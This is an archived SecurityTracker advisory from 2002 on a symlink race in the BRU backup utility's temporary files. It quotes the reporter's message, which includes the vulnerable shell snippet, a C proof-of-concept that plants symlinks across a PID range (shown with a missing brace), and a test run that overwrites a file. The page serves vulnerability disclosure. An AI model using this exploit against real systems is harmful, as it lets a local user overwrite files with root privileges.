SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Report a Bug
Report a vulnerability that you have found to SecurityTracker
Questions?
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
Sign Up!





Category:  Application (Generic)  >  BRU Vendors:  TOLIS Group, Inc.
BRU Backup Utility Has Temporary File Symlink Bug That Lets Local Users Overwrite Any File on the System
Date:  Jan 28 2002
Impact:  Denial of service via local system, Modification of system information, Modification of user information
Exploit Included:  Yes  
Description:  A vulnerability was reported in the BRU file backup application. A local user can overwrite any file on the system.

It is reported that BRU creates unsafe temporary files with a predictable filename based on the process id (pid) of the 'setlicense.sh' script. A local user can create a symbolic link from the predicted temporary file name to another critical file on the system. Then, when the BRU utility is executed (by a root user, as would be normal), the linked file will be overwritten with the text 'foobar' with root level privileges.

A demonstration exploit is provided in the Source Message.
Impact:  A local unprivileged user can cause any file on the system to be overwritten.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.tolisgroup.com/bru3.html (Links to External Site)
Cause:  Access control error, State error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  "Andrew Griffiths" <andrewg@tasmail.com>
Message History:   None.

 Source Message Contents
Date:  Sat, 26 Jan 2002 21:00:55 +1100 (EST)
From:  "Andrew Griffiths" <andrewg@tasmail.com>
Subject:  bru backup program

 

Product: Bru 

Description:
------------

BRU provides fully verified backup and restore operations and offers options 
for most conceivable data backup and  recovery  needs.  BRU is fully device 
independent, so it works with any device or filesystem that  is  supported by 
your operating system.  Verification is performed automatically with BRU's 
Autoscan feature and can also be performed  days,  weeks, or even years after 
a backup is performed.

[ As taken from bru.1 man page ]

Problem:
--------

The usage of insecure tmp files in some of the various shell scripts, which allows
you to overwrite arbitrary files with foobar. Since this script would most 
likely be run by root, it allows you to overwrite any files you want.

Exploit:
--------

This is the beginnings of the setlicense shell script. For those who don't know,
$$ is the current pid of the shell.

#!/bin/sh
printf "%s" foobar >/tmp/brutest.$$ 2>&1
res=`cat /tmp/brutest.$$`
rm -f /tmp/brutest.$$
if test "$res" != "foobar"; then
        alias printf="echo -n -e"
fi

So all that needs to be done is create a fair amount of symbolic links in the
temp directory pointing to the file you want to overwrite.

---[ CUT ]---
/* symace.c -0.0.1 - A generic filesystem symlink/race thinger */

#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>

/* Please note that there is no error checking... */
/* By Andrew Griffiths (nullptr@tasmail.com)    */

int main(int argc, char **argv)
 
        char *overwrite;
        char *base;
        int start_pid, end_pid;
        int i, size;

        overwrite = strdup(argv[1]);
        size = strlen(argv[2]) + 8 + 1;
        base = malloc(size);
        start_pid=atoi(argv[3]);
        end_pid=atoi(argv[4]);

        for(i=start_pid;i<end_pid;i++) {
                memset(base, 0, size-1);
                snprintf(base, size-1, "%s%d", argv[2], i);
                if(symlink(overwrite, base)==-1) {
                        printf("Unable to create %s bailing\n", base);
                        exit(EXIT_FAILURE);
                }
        }
        printf("done\n");
 

Vendor Respone:
---------------

This doesn't make much sense to me, exploiting your own system while you are already root? Correct me
 if I am wrong but this doesn't
 make much sense to me. 

--Mike
BRU Support Team 
The TOLIS Group - http://www.tolisgroup.com 
support@tolisgroup.com 

I think he didn't like my example down there. Everyone else on the list should be able to understand 
it without the need for a # sign...


Test Run:
---------

[andrewg@blackhole src]$ echo hello world > /tmp/hello
[andrewg@blackhole src]$ ./symace /tmp/hello /tmp/brutest. 12037 13000
done

On another terminal:

[andrewg@blackhole x86-linux-glibc2.1]$ ./setlicense
./setlicense: cd: /bru: No such file or directory
/bru does not exist.  BRU may not be installed.

Then back to the other one...

[andrewg@blackhole src]$ cat /tmp/hello
foobar[andrewg@blackhole src]$




--
www.tasmail.com


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC